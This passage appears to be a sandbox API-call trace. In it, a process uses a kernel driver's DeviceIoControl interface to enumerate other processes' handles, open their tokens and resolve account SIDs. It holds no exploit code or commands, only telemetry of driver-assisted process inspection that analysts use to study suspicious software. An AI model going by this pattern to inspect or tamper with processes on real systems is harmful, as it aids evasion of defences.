KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.723] PsReleaseProcessExitSynchronization () returned 0x2 [0247.723] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x21 [0247.724] ObQueryNameString (in: Object=0xfffffa8001f72430, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.724] ObfDereferenceObject (Object=0xfffffa8001f72430) returned 0x1 [0247.724] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.724] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.724] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.724] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0247.724] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.724] PsAcquireProcessExitSynchronization () returned 0x0 [0247.724] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0) [0247.724] ObReferenceObjectByHandle (in: Handle=0x134, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80025d0a60, HandleInformation=0x0) returned 0x0 [0247.724] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.724] PsReleaseProcessExitSynchronization () returned 0x2 [0247.724] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x21 [0247.724] ObQueryNameString (in: Object=0xfffffa80025d0a60, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.724] ObfDereferenceObject (Object=0xfffffa80025d0a60) returned 0x1 [0247.724] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.724] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.724] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.724] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0247.724] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.724] PsAcquireProcessExitSynchronization () returned 0x0 [0247.724] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0) [0247.725] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003015820, HandleInformation=0x0) returned 0x0 [0247.725] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.725] PsReleaseProcessExitSynchronization () returned 0x2 [0247.725] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x21 [0247.725] ObQueryNameString (in: Object=0xfffffa8003015820, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.725] ObfDereferenceObject (Object=0xfffffa8003015820) returned 0x1 [0247.725] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.725] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x690) returned 0xc8 [0247.725] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.725] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80031d3b30, HandleInformation=0x0) returned 0x0 [0247.725] ObOpenObjectByPointer (in: Object=0xfffffa80031d3b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0247.725] ObfDereferenceObject (Object=0xfffffa80031d3b30) returned 0x10 [0247.725] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa80030a0180 | out: TokenHandle=0xfffffa80030a0180*=0xc4) returned 0x0 [0247.725] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0247.725] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.725] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.726] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.728] CloseHandle (hObject=0xc4) returned 1 [0247.728] CloseHandle (hObject=0xc8) returned 1 [0247.728] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.728] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0247.728] PsLookupProcessByProcessId (in: ProcessId=0x690, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.728] PsAcquireProcessExitSynchronization () returned 0x0 [0247.728] KeStackAttachProcess (in: PROCESS=0xfffffa80031d3b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80031d3b30, ApcState=0xfffff880053c85d0) [0247.728] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80032516f0, HandleInformation=0x0) returned 0x0 [0247.728] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.729] PsReleaseProcessExitSynchronization () returned 0x2 [0247.729] ObfDereferenceObject (Object=0xfffffa80031d3b30) returned 0xe [0247.729] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.729] ObfDereferenceObject (Object=0xfffffa80032516f0) returned 0x1 [0247.729] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.729] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.729] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.729] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0247.729] PsLookupProcessByProcessId (in: ProcessId=0x690, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.729] PsAcquireProcessExitSynchronization () returned 0x0 [0247.729] KeStackAttachProcess (in: PROCESS=0xfffffa80031d3b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80031d3b30, ApcState=0xfffff880053c85d0) [0247.729] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003251840, HandleInformation=0x0) returned 0x0 [0247.729] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.729] PsReleaseProcessExitSynchronization () returned 0x2 [0247.729] ObfDereferenceObject (Object=0xfffffa80031d3b30) returned 0xe [0247.729] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.729] ObfDereferenceObject (Object=0xfffffa8003251840) returned 0x1 [0247.729] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.729] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.729] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.729] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0247.730] PsLookupProcessByProcessId (in: ProcessId=0x690, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.730] PsAcquireProcessExitSynchronization () returned 0x0 [0247.730] KeStackAttachProcess (in: PROCESS=0xfffffa80031d3b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80031d3b30, ApcState=0xfffff880053c85d0) [0247.730] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800261d390, HandleInformation=0x0) returned 0x0 [0247.730] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.730] PsReleaseProcessExitSynchronization () returned 0x2 [0247.730] ObfDereferenceObject (Object=0xfffffa80031d3b30) returned 0xe [0247.730] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.730] ObfDereferenceObject (Object=0xfffffa800261d390) returned 0x3 [0247.730] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.730] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xad0) returned 0xc8 [0247.730] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.730] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80021226d0, HandleInformation=0x0) returned 0x0 [0247.730] ObOpenObjectByPointer (in: Object=0xfffffa80021226d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0247.730] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x14 [0247.730] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa80030a0180 | out: TokenHandle=0xfffffa80030a0180*=0xc4) returned 0x0 [0247.730] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0247.730] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.731] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.731] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.733] CloseHandle (hObject=0xc4) returned 1 [0247.733] CloseHandle (hObject=0xc8) returned 1 [0247.733] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.733] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0247.733] PsLookupProcessByProcessId (in: ProcessId=0xad0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.733] PsAcquireProcessExitSynchronization () returned 0x0 [0247.733] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880053c85d0) [0247.733] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80032501b0, HandleInformation=0x0) returned 0x0 [0247.733] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.733] PsReleaseProcessExitSynchronization () returned 0x2 [0247.733] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x12 [0247.733] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.733] ObfDereferenceObject (Object=0xfffffa80032501b0) returned 0x1 [0247.733] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.734] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.734] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.734] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0247.734] PsLookupProcessByProcessId (in: ProcessId=0xad0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.734] PsAcquireProcessExitSynchronization () returned 0x0 [0247.734] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880053c85d0) [0247.734] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002fa5d20, HandleInformation=0x0) returned 0x0 [0247.734] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.734] PsReleaseProcessExitSynchronization () returned 0x2 [0247.734] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x12 [0247.734] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.734] ObfDereferenceObject (Object=0xfffffa8002fa5d20) returned 0x1 [0247.734] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.734] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x64) returned 0xc8 [0247.734] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.734] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800207b530, HandleInformation=0x0) returned 0x0 [0247.734] ObOpenObjectByPointer (in: Object=0xfffffa800207b530, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0247.734] ObfDereferenceObject (Object=0xfffffa800207b530) returned 0x1c [0247.734] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa80030a0180 | out: TokenHandle=0xfffffa80030a0180*=0xc4) returned 0x0 [0247.734] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0247.735] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.735] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.735] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.737] CloseHandle (hObject=0xc4) returned 1 [0247.737] CloseHandle (hObject=0xc8) returned 1 [0247.737] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.737] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0247.737] PsLookupProcessByProcessId (in: ProcessId=0x64, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.737] PsAcquireProcessExitSynchronization () returned 0x0 [0247.737] KeStackAttachProcess (in: PROCESS=0xfffffa800207b530, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800207b530, ApcState=0xfffff880053c85d0) [0247.737] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002fa48f0, HandleInformation=0x0) returned 0x0 [0247.737] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.737] PsReleaseProcessExitSynchronization () returned 0x2 [0247.737] ObfDereferenceObject (Object=0xfffffa800207b530) returned 0x1a [0247.737] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.737] ObfDereferenceObject (Object=0xfffffa8002fa48f0) returned 0x1 [0247.737] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.737] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.737] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.737] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0247.737] PsLookupProcessByProcessId (in: ProcessId=0x64, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.738] PsAcquireProcessExitSynchronization () returned 0x0 [0247.738] KeStackAttachProcess (in: PROCESS=0xfffffa800207b530, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800207b530, ApcState=0xfffff880053c85d0) [0247.738] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80023483a0, HandleInformation=0x0) returned 0x0 [0247.738] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.738] PsReleaseProcessExitSynchronization () returned 0x2 [0247.738] ObfDereferenceObject (Object=0xfffffa800207b530) returned 0x1a [0247.738] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.738] ObfDereferenceObject (Object=0xfffffa80023483a0) returned 0x1 [0247.738] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.738] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.738] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.738] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x110, lpOverlapped=0x0) returned 1 [0247.738] PsLookupProcessByProcessId (in: ProcessId=0x64, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.738] PsAcquireProcessExitSynchronization () returned 0x0 [0247.738] KeStackAttachProcess (in: PROCESS=0xfffffa800207b530, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800207b530, ApcState=0xfffff880053c85d0) [0247.738] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003109700, HandleInformation=0x0) returned 0x0 [0247.738] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.738] PsReleaseProcessExitSynchronization () returned 0x2 [0247.738] ObfDereferenceObject (Object=0xfffffa800207b530) returned 0x1a [0247.738] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.738] ObfDereferenceObject (Object=0xfffffa8003109700) returned 0x1 [0247.738] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.738] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.738] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.739] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0247.739] PsLookupProcessByProcessId (in: ProcessId=0x64, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.739] PsAcquireProcessExitSynchronization () returned 0x0 [0247.739] KeStackAttachProcess (in: PROCESS=0xfffffa800207b530, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800207b530, ApcState=0xfffff880053c85d0) [0247.739] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800261d390, HandleInformation=0x0) returned 0x0 [0247.739] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.739] PsReleaseProcessExitSynchronization () returned 0x2 [0247.739] ObfDereferenceObject (Object=0xfffffa800207b530) returned 0x1a [0247.739] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.739] ObfDereferenceObject (Object=0xfffffa800261d390) returned 0x3 [0247.739] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.739] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.739] OpenProcess (dwDesiredAccess=0x400, 